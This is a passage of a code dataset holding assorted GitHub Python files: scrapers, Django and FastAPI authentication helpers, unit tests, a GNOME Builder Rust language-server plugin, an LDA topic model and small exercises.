args.output)\n","repo_name":"AlpinDale/VNParser","sub_path":"tools/data-parser.py","file_name":"data-parser.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"}
+{"seq_id":"21511688299","text":"# -*- coding: utf-8 -*-\nfrom retrying import retry\nimport requests\nfrom requests.exceptions import ConnectionError, ConnectTimeout, ReadTimeout\nfrom fake_useragent import UserAgent\n\nheader = {\"User-Agent\": UserAgent().random}\n\n\ndef downloader(url, method, data=None, headers={}, proxies=None, retry_times=10):\n \"\"\"\n 通用下载器\n :param url: url\n :param method: 请求方法,只支持get跟post\n :param data: post表单参数\n :param proxies: 代理\n :param retry_times: 重试次数\n :return: 响应结果\n \"\"\"\n headers = dict(header, **headers)\n while retry_times > 0:\n try:\n if method == 'GET':\n if proxies:\n res = requests.get(url=url, headers=headers, proxies=proxies, timeout=30)\n else:\n res = requests.get(url=url, headers=headers, timeout=30)\n else:\n if proxies:\n res = requests.post(url=url, data=data, headers=headers, proxies=proxies, timeout=30)\n else:\n res = requests.post(url=url, data=data, headers=headers, timeout=30)\n if res.status_code in [200, 201, 202]:\n return res.text\n except (ConnectTimeout, ReadTimeout, ConnectionError):\n print(\"抓取失败\", url)\n return None\n except Exception as e:\n print(f'请求出错:{repr(e)}--开始重试')\n if retry_times > 0:\n retry_times -= 1\n\n\n@retry(stop_max_attempt_number=8)\ndef downloader_old(url, method, data=None, options={}):\n \"\"\"\n 通用下载器,只处理get跟post请求\n :param url:\n :param method:\n :param data:\n :param proxies:\n :return:\n \"\"\"\n headers = dict(header, **options)\n while True:\n try:\n if method == 'GET':\n response = requests.get(url=url, headers=headers, timeout=10)\n if response.status_code in [200, 201, 202]:\n return response.text\n else:\n response = requests.post(url=url, headers=headers, data=data, timeout=10)\n if response.status_code in [200, 201, 202]:\n return response.text\n except (ConnectTimeout, ReadTimeout, ConnectionError):\n print(\"抓取失败\", url)\n return None\n except Exception as e:\n print(e.args)","repo_name":"pythonyhd/proxy_pool","sub_path":"proxypool/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"}
+{"seq_id":"40793196816","text":"import timeit\n\nimport numpy as np\nimport pandas as pd\nfrom ranking_util import basestuff, TwoD\nfrom necklace_split_binary import necklace_split\nfrom copy import deepcopy\n\n\ndef hybrid(path, sens_attr, columns, number_of_buckets):\n G = list(pd.read_csv(path)[sens_attr].values)\n n = len(G)\n basestuff.read_file(file=path, columns=columns)\n TwoD.initialize()\n number_of_cuts = []\n boundary_indices = []\n boundaries = []\n hash_buckets = []\n Theta = []\n swap_index = []\n start = timeit.default_timer()\n for i in range(n * n):\n r_, j, theta = TwoD.GetNext()\n r = deepcopy(r_)\n if r is not None and j != -1:\n idx1 = r[j]\n idx2 = r[j + 1]\n if i == 0 or (idx2 in boundary_indices and G[idx1] != G[idx2]):\n F = necklace_split(\n path, columns, sens_attr, number_of_buckets, r, theta\n )\n boundary_indices = F[0]\n boundaries.append(F[1])\n hash_buckets.append((F[2]))\n number_of_cuts.append(len(F[1]))\n Theta.append(theta)\n swap_index.append(j)\n elif r is not None and j == -1:\n F = necklace_split(path, columns, sens_attr, number_of_buckets, r, theta)\n boundary_indices = F[0]\n boundaries.append(F[1])\n hash_buckets.append((F[2]))\n number_of_cuts.append(len(F[1]))\n Theta.append(theta)\n swap_index.append(j)\n else:\n break\n stop = timeit.default_timer()\n return (\n number_of_cuts[np.argmin(number_of_cuts)],\n boundaries[np.argmin(number_of_cuts)],\n hash_buckets[np.argmin(number_of_cuts)],\n Theta[np.argmin(number_of_cuts)],\n stop - start,\n swap_index\n )\n","repo_name":"UIC-InDeXLab/fairHashmap","sub_path":"hybrid.py","file_name":"hybrid.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"30904062621","text":"import unittest\nimport os\nimport sys\nimport filecmp\nimport pdb\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nfrom pre_processing import metric_pre_processing as mpp\n\nclass MetricPreProcessingTest(unittest.TestCase):\n def test_add_rows(self):\n row1 = ['2019-11-25 15:58:59 CEST', '16.0', '11200000000', '8', '1.99', '1.94', '2.13']\n row2 = ['2019-11-25 15:58:59 CEST', '14.0', '11400000000', '8', '2.01', '1.96', '2.15']\n expected_result = ['2019-11-25 15:58:59 CEST', 30.0, 22600000000.0, 16.0, 4.0, 3.9, 4.28]\n\n self.assertEqual(expected_result, mpp._add_rows(row1, row2))\n\n def test_get_average_for_row(self):\n row = ['2019-11-25 15:58:59 CEST', 30.0, 22600000000.0, 16.0, 4.0, 3.9, 4.28]\n expected_result = [\n '2019-11-25 15:58:59 CEST',\n '15.0',\n '11300000000.0',\n '8.0',\n '2.0',\n '1.95',\n '2.14']\n\n self.assertEqual(expected_result, mpp._get_average_for_row(row, 2))\n\n def test_get_average_for_row_with_strings_as_elements(self):\n row = ['2019-11-25 15:58:59 CEST', '15.0', '11300000000.0', '8.0', '2.0', '1.95', '2.14']\n expected_result = [\n '2019-11-25 15:58:59 CEST',\n '15.0',\n '11300000000.0',\n '8.0',\n '2.0',\n '1.95',\n '2.14']\n\n self.assertEqual(expected_result, mpp._get_average_for_row(row, 1))\n\n def test_get_output_file_name_with_suffix(self):\n self.assertEqual('./test_suffix.csv', mpp._get_output_file_name_with_suffix('./test.csv', '_suffix'))\n self.assertEqual('/this/is/a/absolute/path/to/a/file_suffix.csv',\n mpp._get_output_file_name_with_suffix('/this/is/a/absolute/path/to/a/file.csv', '_suffix'))\n\n\n def test_get_interpolated_rows_1_second_gap(self):\n row1 = ['2019-11-19 16:56:32 CEST','12','10000000000','8','0.8','1.02','1.18']\n row2 = ['2019-11-19 16:56:34 CEST','10','11000000000','8','0.8','1.00','1.20']\n\n expected = [['2019-11-19 16:56:33 CEST', '11.0', '10500000000.0', '8.0', '0.8', '1.01', '1.19']]\n actual = mpp._get_interpolated_rows(row1, row2)\n\n self.assertEqual(expected, actual)\n\n def test_get_interpolated_rows_2_second_gap(self):\n row1 = ['2019-11-19 16:56:32 CEST','12','10000000000','8','0.8','1.02','1.18']\n row2 = ['2019-11-19 16:56:35 CEST','9','11500000000','8','1.1','1.02','1.21']\n\n expected = [\n ['2019-11-19 16:56:33 CEST', '11.0', '10500000000.0', '8.0', '0.9', '1.02', '1.19'],\n ['2019-11-19 16:56:34 CEST', '10.0', '11000000000.0', '8.0', '1.0', '1.02', '1.20'] \n ]\n actual = mpp._get_interpolated_rows(row1, row2)\n\n \n def test_get_metrics_on_seconds_interval(self):\n mpp.get_metrics_on_seconds_interval('./data/test_metrics.csv')\n\n output_file_written = os.path.exists('./data/test_metrics_seconds.csv')\n\n self.assertTrue(output_file_written)\n self.assertTrue(filecmp.cmp('./data/test_metrics_seconds.csv', './data/test_metrics_seconds_expected.csv'))\n os.remove('./data/test_metrics_seconds.csv')\n \n def test_fill_metrics_missing_seconds_using_linear_interpolation(self):\n mpp.fill_metrics_missing_seconds_using_linear_interpolation('./data/test_metrics2.csv')\n\n output_file_written = os.path.exists('./data/test_metrics2_filled.csv')\n self.assertTrue(output_file_written)\n self.assertTrue(filecmp.cmp('./data/test_metrics2_filled.csv', './data/test_metrics2_expected.csv'))\n # os.remove('./data/test_metrics_seconds.csv')\n\nif __name__ == '__main__':\n 
unittest.main()\n","repo_name":"Context-Aware-Monitoring/Efficient-Stream-Monitoring","sub_path":"tests/test_metric_pre_processing.py","file_name":"test_metric_pre_processing.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"22807046947","text":"#!/usr/bin/env python3\n\n#10 Ingresar 3 valores entre 0 y 100 y generar un gráfico de torta (usar 8.3)\n\nimport turtle\n\nt=turtle.Turtle()\nu=turtle.Turtle()\n\ndef CrearPoligono (radio,porcentaje,ancho,color=\"black\"):\n## t.speed(1)\n arco=0\n arco=(porcentaje*360/100)\n x=t.xcor()\n y=t.ycor()\n t.lt(90)\n t.penup()\n t.setposition(x,y)\n t.pendown()\n t.pencolor(\"black\")\n t.fillcolor(color) \n t.width (ancho)\n t.begin_fill()\n t.fd(radio)\n t.rt(180-arco)\n t.fd(radio)\n t.penup()\n t.setposition(x,y)\n t.pendown()\n t.lt(90-arco)\n t.circle(radio,arco)\n t.end_fill() \n t.hideturtle()\n\n\ncolor=[\"blue\",\"red\",\"green\"]\nxw=-50\nyw=-40\nfor b in range (3):\n porcentaje=(int(input(\"Ingrese porcentaje a graficar: \")))\n CrearPoligono (100,porcentaje,3,color[b])\n u.penup()\n u.setposition(xw+(50*b),yw)\n u.pendown()\n u.pencolor(color[b])\n u.write(str(porcentaje)+\"%\")\n u.hideturtle()\n\n\n##CrearPoligono (100,60,5,\"blue\")\n##CrearPoligono (100,80,5,\"green\")\n##CrearPoligono (100,120,5,\"red\")\n##CrearPoligono (100,100,5,\"orange\")\n \n","repo_name":"DamianNery/Tecnicas-De-Programacion","sub_path":"4Abril/13/GraficoTorta.py","file_name":"GraficoTorta.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"5073977924","text":"import sys\n\nimport extern as ext\n\n\ndef str_diff(str1, str2):\n if len(str1) != len(str2):\n print('problem3: str_diff: str1 length {} not equal to str2 length {}'.format(len(str1), len(str2)))\n return sys.maxsize\n\n diff_count = 0\n for i in range(len(str1)):\n if str1[i] != str2[i]:\n diff_count += 1\n\n return diff_count\n\n\ndef run():\n with open(ext.FilenameIn) as f_in:\n pattern = f_in.readline().strip()\n genome = f_in.readline().strip()\n d = int(f_in.readline())\n\n positions = []\n\n for i in range(len(genome) - len(pattern) + 1):\n genome_window = genome[i:i + len(pattern)]\n d_curr = str_diff(pattern, genome_window)\n if d_curr <= d:\n positions.append(str(i))\n\n with open(ext.FilenameOut, 'w') as f_out:\n f_out.write(' '.join(positions))\n","repo_name":"DeSerg/mipt-solutions","sub_path":"Term10/bioinformatics_tasks/problems/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"71021285173","text":"from django.contrib.auth import get_user_model\nfrom django.utils import timezone\nfrom rest_framework import generics, status, permissions\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom member.serializers import UserSerializer\nUserModel = get_user_model()\n\n\nclass TokenLoginView(APIView):\n \"\"\"\n 토큰으로 로그인\n \"\"\"\n\n permission_classes = []\n\n def post(self, request):\n r_token = request.data.get('token', None)\n\n if not r_token:\n return Response({'detail': '토큰이 없습니다.'}, status=status.HTTP_400_BAD_REQUEST)\n\n token = Token.objects.filter(key=r_token).first()\n if not token:\n return Response({'detail': '토큰이 유효하지 않습니다.'}, status=status.HTTP_404_NOT_FOUND)\n\n user = UserModel.objects.filter(id=token.user_id).first()\n if not user:\n return Response({'detail': '존재하지 않는 사용자입니다.'}, status=status.HTTP_404_NOT_FOUND)\n\n user.update_date = timezone.now()\n user.save()\n\n user_serializer = UserSerializer(user, context={'request': request})\n context = {\n 'token': token.key,\n 'user': user_serializer.data\n }\n\n return Response(context, status=status.HTTP_200_OK)\n\n\nclass UserLogoutView(APIView):\n \"\"\"\n 사용자 로그아웃\n \"\"\"\n\n permission_classes = (\n permissions.IsAuthenticated,\n )\n\n def post(self, request):\n r_user = request.user\n user = UserModel.objects.filter(id=r_user.id).first()\n if not user:\n return Response({'detail': '존재하지 않는 사용자입니다.'}, status=status.HTTP_400_BAD_REQUEST)\n \n try:\n request.user.auth_token.delete()\n except Exception as error:\n message = '{}'.format(error)\n return Response({'detail': message}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n return Response({'result': 'ok'}, status=status.HTTP_200_OK)\n","repo_name":"zinns58/example-django-test","sub_path":"project/member/views/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"70869602613","text":"from datetime import datetime\nfrom config import SECRET_KEY, ALGORITHM\nimport jwt\nfrom jwt.exceptions import PyJWTError\nfrom fastapi import HTTPException, Depends, status\nfrom fastapi.security import HTTPAuthorizationCredentials, HTTPBearer\n\n\nsecurity_scheme = HTTPBearer()\n\ndef verify_jwt_token(token: str):\n try:\n payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM])\n expiration = datetime.fromtimestamp(payload[\"exp\"])\n if datetime.now() > expiration:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Token has expired\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n else:\n return payload\n except PyJWTError:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Invalid authentication credentials\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n\nasync def get_current_user(token: HTTPAuthorizationCredentials = Depends(security_scheme)):\n return verify_jwt_token(token.credentials)\n","repo_name":"a7744hsc/DFChat","sub_path":"backend/utils/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"16708959524","text":"from concurrent import futures\n\nimport grpc\nfrom flask import Flask\n\nimport proto_example_pb2\nimport proto_example_pb2_grpc\n\napp = Flask(__name__)\n\n\nclass GreetingServicer(proto_example_pb2_grpc.GreetingServiceServicer):\n def SayHello(self, request, context):\n response = proto_example_pb2.Response()\n response.message = f\"Hello, {request.message}!\"\n return response\n\n\nserver = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\nproto_example_pb2_grpc.add_GreetingServiceServicer_to_server(GreetingServicer(), server)\nserver.add_insecure_port(\"[::]:50051\")\n\n\n@app.route(\"/\")\ndef index():\n return \"gRPC Server is running!\"\n\n\nif __name__ == \"__main__\":\n server.start()\n app.run(host=\"0.0.0.0\", port=5001)\n","repo_name":"surya18091997/personal","sub_path":"grpc_server.py","file_name":"grpc_server.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"28794411371","text":"import time\n\nfrom osbrain import Agent\nfrom osbrain import run_agent\nfrom osbrain import run_nameserver\n\n\nclass Greeter(Agent):\n def on_init(self):\n self.bind('PUSH', alias='main')\n\n def hello(self, name):\n self.send('main', 'Hello, %s!' % name)\n\n\nclass Bob(Agent):\n def custom_log(self, message):\n self.log_info('Received: %s' % message)\n\n\nif __name__ == '__main__':\n\n # System deployment\n ns = run_nameserver()\n alice = run_agent('Alice', base=Greeter)\n bob = run_agent('Bob', base=Bob)\n\n # System configuration\n bob.connect(alice.addr('main'), handler='custom_log')\n\n # Send messages\n for _ in range(3):\n alice.hello('Bob')\n time.sleep(1)\n\n ns.shutdown()\n","repo_name":"opensistemas-hub/osbrain","sub_path":"examples/push_pull_inherit.py","file_name":"push_pull_inherit.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":172,"dataset":"github-code","pt":"21"}
+{"seq_id":"21484473653","text":"import os\nimport string\n\nimport numpy as np\nimport pandas as pd\n\nimport nltk\nfrom nltk import word_tokenize, sent_tokenize, corpus\nfrom nltk.stem import PorterStemmer, WordNetLemmatizer\n\nimport gensim\nfrom gensim.models import LdaModel\nfrom gensim.corpora.dictionary import Dictionary\n\n\nnltk.download('popular')\n\n\nclass Lda2vec:\n def __init__(self, tokenizer=None, num_topics=50):\n '''\n :parameter tokenizer: tokenizer function, default nltk word tokenizer\n :parameter num_topics: number of topics, default 50\n '''\n self.num_topics = num_topics\n self.tokenizer = tokenizer if tokenizer is not None else self.__tokenizer\n\n self.dictionary = None\n self.lda = None\n self.__is_fitted = False\n\n\n def __check_fitted(self):\n if not self.__is_fitted:\n raise RuntimeError('Model has not been fitted, call fit(input_corpus) first.')\n\n\n def __tokenizer(self, text):\n tokens = []\n porter_stemmer = PorterStemmer()\n lemmatizer = WordNetLemmatizer()\n stop_words = set(corpus.stopwords.words('english'))\n\n text = ''.join(char for char in text if char not in string.punctuation)\n\n for sent in sent_tokenize(text, language='english'):\n for word in word_tokenize(sent, language='english'):\n if len(word) < 2 or word.lower() in stop_words:\n continue\n\n word = lemmatizer.lemmatize(word)\n # word = porter_stemmer.stem(word)\n tokens.append(word)\n\n return tokens\n\n\n def fit(self, input_tokens=None, input_strings=None):\n '''\n :parameter input_strings: iterable of strings,\n e.g. ['i love cs', 'i hate statistics']\n :parameter input_tokens: iterable of iterable of tokens,\n e.g. [['i', 'love', 'cs'], ['i', 'hate', 'statistics']]\n '''\n\n if input_strings is None and input_tokens is None:\n raise RuntimeError('Either input_tokens or input_strings must not be None.')\n\n if not input_tokens:\n input_tokens = list(map(self.tokenizer, input_strings))\n\n self.dictionary = Dictionary(input_tokens)\n self.corpus = [self.dictionary.doc2bow(tokens) for tokens in input_tokens]\n self.lda = LdaModel(self.corpus, num_topics=self.num_topics, alpha='auto', eval_every=5)\n self.__is_fitted = True\n\n\n def get_doc_vec(self, words):\n '''\n :parameter words: iterable of tokens, e.g. ['i', 'love', 'cs']\n :returns np.ndarray of shape (num_topics, ) where each value represents the prob of the words being in that topic\n '''\n self.__check_fitted()\n vec = np.zeros(self.num_topics, )\n bow = self.dictionary.doc2bow(words)\n for i, p in self.lda[bow]:\n vec[i] = p\n return vec\n\n\nif __name__ == '__main__':\n data_dir = '../data/'\n df = pd.read_csv(os.path.join(data_dir, 'fulltrain.csv'), names=('Verdict', 'Text'))\n\n model = Lda2vec(num_topics=10)\n model.fit(input_strings=df['Text'])\n x = model.get_doc_vec('i love cs'.split())\n","repo_name":"careycwang/CS4248-Fake-News-Detection","sub_path":"src/Lda2vec.py","file_name":"Lda2vec.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"28124294712","text":"import sys\n\nLIMIT = 5 # 1000\n\n\ndef convert_to_intlist(line):\n return [int(elem) for elem in line.split()]\n\n\ndef minimum_steps_to_make_array_sorted(array, n):\n table = [[0] * LIMIT for _ in range(n)]\n elem = array[0]\n for x in range(1, LIMIT+1):\n table[0][x-1] = abs(x - elem)\n\n for ix in range(1, n):\n elem = array[ix]\n m = table[ix-1][0]\n for y in range(1, LIMIT+1):\n m = min(m, table[ix-1][y-1])\n table[ix][y-1] = m + abs(y - elem)\n return min(table[n-1][x-1] for x in range(1, LIMIT+1))\n\n\ndef main():\n reader = sys.stdin\n n = int(next(reader))\n array = convert_to_intlist(next(reader))\n result = minimum_steps_to_make_array_sorted(array, n)\n print(result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ghostrider77/competitive-programming-skills","sub_path":"Python/21_make_it_sorted.py","file_name":"21_make_it_sorted.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"17443577003","text":"import gi\nimport os\n\nfrom gi.repository import GLib\nfrom gi.repository import Gio\nfrom gi.repository import GObject\nfrom gi.repository import Ide\n\nDEV_MODE = False\n\nclass RlsService(Ide.Object):\n _client = None\n _has_started = False\n _supervisor = None\n _monitor = None\n\n @classmethod\n def from_context(klass, context):\n return context.ensure_child_typed(RlsService)\n\n @GObject.Property(type=Ide.LspClient)\n def client(self):\n return self._client\n\n @client.setter\n def client(self, value):\n self._client = value\n self.notify('client')\n\n def do_parent_set(self, parent):\n \"\"\"\n After the context has been loaded, we want to watch the project\n Cargo.toml for changes if we find one. That will allow us to\n restart the process as necessary to pick up changes.\n \"\"\"\n if parent is None:\n return\n\n context = self.get_context()\n workdir = context.ref_workdir()\n cargo_toml = workdir.get_child('Cargo.toml')\n\n if cargo_toml.query_exists():\n try:\n self._monitor = cargo_toml.monitor(0, None)\n self._monitor.set_rate_limit(5 * 1000) # 5 Seconds\n self._monitor.connect('changed', self._monitor_changed_cb)\n except Exception as ex:\n Ide.debug('Failed to monitor Cargo.toml for changes:', repr(ex))\n\n def _monitor_changed_cb(self, monitor, file, other_file, event_type):\n \"\"\"\n This method is called when Cargo.toml has changed. We need to\n cancel any supervised process and force the language server to\n restart. Otherwise, we risk it not picking up necessary changes.\n \"\"\"\n if self._supervisor is not None:\n subprocess = self._supervisor.get_subprocess()\n if subprocess is not None:\n subprocess.force_exit()\n\n def do_stop(self):\n \"\"\"\n Stops the Rust Language Server upon request to shutdown the\n RlsService.\n \"\"\"\n if self._monitor is not None:\n monitor, self._monitor = self._monitor, None\n if monitor is not None:\n monitor.cancel()\n\n if self._supervisor is not None:\n supervisor, self._supervisor = self._supervisor, None\n supervisor.stop()\n\n def _ensure_started(self):\n \"\"\"\n Start the rust service which provides communication with the\n Rust Language Server. 
We supervise our own instance of the\n language server and restart it as necessary using the\n Ide.SubprocessSupervisor.\n\n Various extension points (diagnostics, symbol providers, etc) use\n the RlsService to access the rust components they need.\n \"\"\"\n # To avoid starting the `rls` process unconditionally at startup,\n # we lazily start it when the first provider tries to bind a client\n # to its :client property.\n if not self._has_started:\n self._has_started = True\n\n # Setup a launcher to spawn the rust language server\n launcher = self._create_launcher()\n launcher.set_clear_env(False)\n sysroot = self._discover_sysroot()\n if sysroot:\n launcher.setenv(\"SYS_ROOT\", sysroot, True)\n launcher.setenv(\"LD_LIBRARY_PATH\", os.path.join(sysroot, \"lib\"), True)\n if DEV_MODE:\n launcher.setenv('RUST_LOG', 'debug', True)\n\n # Locate the directory of the project and run rls from there.\n workdir = self.get_context().ref_workdir()\n launcher.set_cwd(workdir.get_path())\n\n # If rls was installed with Cargo, try to discover that\n # to save the user having to update PATH.\n path_to_rls = os.path.expanduser(\"~/.cargo/bin/rls\")\n if os.path.exists(path_to_rls):\n old_path = os.getenv('PATH')\n new_path = os.path.expanduser('~/.cargo/bin')\n if old_path is not None:\n new_path += os.path.pathsep + old_path\n launcher.setenv('PATH', new_path, True)\n else:\n path_to_rls = \"rls\"\n\n # Setup our Argv. We want to communicate over STDIN/STDOUT,\n # so it does not require any command line options.\n launcher.push_argv(path_to_rls)\n\n # Spawn our peer process and monitor it for\n # crashes. We may need to restart it occasionally.\n self._supervisor = Ide.SubprocessSupervisor()\n self._supervisor.connect('spawned', self._rls_spawned)\n self._supervisor.set_launcher(launcher)\n self._supervisor.start()\n\n def _rls_spawned(self, supervisor, subprocess):\n \"\"\"\n This callback is executed when the `rls` process is spawned.\n We can use the stdin/stdout to create a channel for our\n LspClient.\n \"\"\"\n stdin = subprocess.get_stdin_pipe()\n stdout = subprocess.get_stdout_pipe()\n io_stream = Gio.SimpleIOStream.new(stdout, stdin)\n\n if self._client:\n self._client.stop()\n self._client.destroy()\n\n self._client = Ide.LspClient.new(io_stream)\n self.append(self._client)\n self._client.add_language('rust')\n self._client.start()\n self.notify('client')\n\n def _create_launcher(self):\n \"\"\"\n Creates a launcher to be used by the rust service. This needs\n to be run on the host because we do not currently bundle rust\n inside our flatpak.\n\n In the future, we might be able to rely on the runtime for\n the tooling. Maybe even the program if flatpak-builder has\n prebuilt our dependencies.\n \"\"\"\n flags = Gio.SubprocessFlags.STDIN_PIPE | Gio.SubprocessFlags.STDOUT_PIPE\n if not DEV_MODE:\n flags |= Gio.SubprocessFlags.STDERR_SILENCE\n launcher = Ide.SubprocessLauncher()\n launcher.set_flags(flags)\n launcher.set_cwd(GLib.get_home_dir())\n launcher.set_run_on_host(True)\n return launcher\n\n def _discover_sysroot(self):\n \"\"\"\n The Rust Language Server needs to know where the sysroot is of\n the Rust installation we are using. 
This is simple enough to\n get, by using `rust --print sysroot` as the rust-language-server\n documentation suggests.\n \"\"\"\n for rustc in ['rustc', os.path.expanduser('~/.cargo/bin/rustc')]:\n try:\n launcher = self._create_launcher()\n launcher.push_args([rustc, '--print', 'sysroot'])\n subprocess = launcher.spawn()\n _, stdout, _ = subprocess.communicate_utf8()\n return stdout.strip()\n except:\n pass\n\n @classmethod\n def bind_client(klass, provider):\n \"\"\"\n This helper tracks changes to our client as it might happen when\n our `rls` process has crashed.\n \"\"\"\n context = provider.get_context()\n self = RlsService.from_context(context)\n self._ensure_started()\n self.bind_property('client', provider, 'client', GObject.BindingFlags.SYNC_CREATE)\n\nclass RlsDiagnosticProvider(Ide.LspDiagnosticProvider, Ide.DiagnosticProvider):\n def do_load(self):\n RlsService.bind_client(self)\n\nclass RlsCompletionProvider(Ide.LspCompletionProvider, Ide.CompletionProvider):\n def do_load(self, context):\n RlsService.bind_client(self)\n\n def do_get_priority(self, context):\n # This provider only activates when it is very likely that we\n # want the results. So use high priority (negative is better).\n return -1000\n\nclass RlsRenameProvider(Ide.LspRenameProvider, Ide.RenameProvider):\n def do_load(self):\n RlsService.bind_client(self)\n\nclass RlsSymbolResolver(Ide.LspSymbolResolver, Ide.SymbolResolver):\n def do_load(self):\n RlsService.bind_client(self)\n\nclass RlsHighlighter(Ide.LspHighlighter, Ide.Highlighter):\n def do_load(self):\n RlsService.bind_client(self)\n\nclass RlsFormatter(Ide.LspFormatter, Ide.Formatter):\n def do_load(self):\n RlsService.bind_client(self)\n\nclass RlsHoverProvider(Ide.LspHoverProvider, Ide.HoverProvider):\n def do_prepare(self):\n self.props.category = 'Rust'\n self.props.priority = 200\n RlsService.bind_client(self)\n","repo_name":"acidburn0zzz/gnome-builder","sub_path":"src/plugins/rls/rls_plugin.py","file_name":"rls_plugin.py","file_ext":"py","file_size_in_byte":8408,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
+{"seq_id":"21544538572","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\nurl = raw_input('type Url:')\r\n#url = 'http://www.meitulu.com/item/8696.html'\r\n#http://www.meitulu.com/item/3499.html\r\nress = requests.get(url)\r\nress.encoding = 'utf-8'\r\nsoup = BeautifulSoup(ress.text,'html.parser')\r\n\r\nfor link in soup.select('a'):\r\n item = 'http://www.meitulu.com/item/'\r\n aa = link.get('href')\r\n if aa[0:28] == item:\r\n ress2 = requests.get(aa)\r\n ress2.encoding = 'utf-8'\r\n soup2 = BeautifulSoup(ress2.text,'html.parser')\r\n #print (soup2)\r\n #soup2 = soup2.find_all('img') \r\n soup2 = soup2.find_all(\"img\",class_=\"content_img\")\r\n for list in soup2: \r\n linkk = list.get('src')\r\n print (linkk)\r\n\r\n\r\n\r\n","repo_name":"zxcke/GetPic","sub_path":"getlist--.py","file_name":"getlist--.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"10634035675","text":"from src.mobile.npc.player.player import Player\nfrom src.mobile.npc.mobs.merchant import Merchant\nfrom src.equipment.items import glasses\nfrom src.equipment.weapons import player_knife\n\n\ndef test_init(player):\n assert player.name == \"Vasiliy\"\n\n\ndef test_heal(player):\n player.max_hp = 20\n player.hp = 18\n player.heal()\n assert player.hp == 20\n\n\ndef test_do_showshopitems(world):\n player = world.add(Player('Petya'), (0, 0))\n player.showshopitems()\n assert player.last_happend == 'Petya спросил никого о торгах'\n\n m = world.add(Merchant(), (0, 10)).start_equip()\n player.showshopitems()\n assert player.last_happend == 'Petya спросил никого о торгах'\n\n world.add(Merchant(), (0, 1)).start_equip()\n player.showshopitems()\n assert player.last_happend != 'Petya спросил никого о торгах'\n\n\ndef test_do_share(world):\n p1 = Player('Штирлиц')\n p1_inv_before = p1.inventory\n p1.position = (10, 0)\n p2 = Player('Исаев')\n p2_inv_before = p2.inventory\n p2.position = (0, 0)\n world.players[(0, 0)] = p2\n p1.world = world\n p1.inventory += [glasses()]\n p1.share('Исаев', 'очки')\n assert p1.last_happend == 'Штирлиц слишком далеко от Исаев'\n assert p2.inventory == p2_inv_before\n\n p1.position = (0, 0)\n p1.share('Исаев', 'очки')\n assert p1.last_happend == 'Штирлиц передал очки в руки Исаев'\n assert p2.inventory[-1].name == 'очки'\n assert len(p1.inventory) == len(p1_inv_before)\n\n p1.share('Исаев', 'очки')\n assert p1.last_happend == \"Штирлиц не может дать очки в руки Исаев\"\n\n\ndef test_do_equip(player):\n player.inventory = [player_knife()]\n assert player.equipment['основное'] is None\n player.equip('меч')\n assert player.equipment['основное'].name == 'меч'\n assert player.equipment['основное'].user == player\n","repo_name":"arovesto/underdanger","sub_path":"test/player_test.py","file_name":"player_test.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
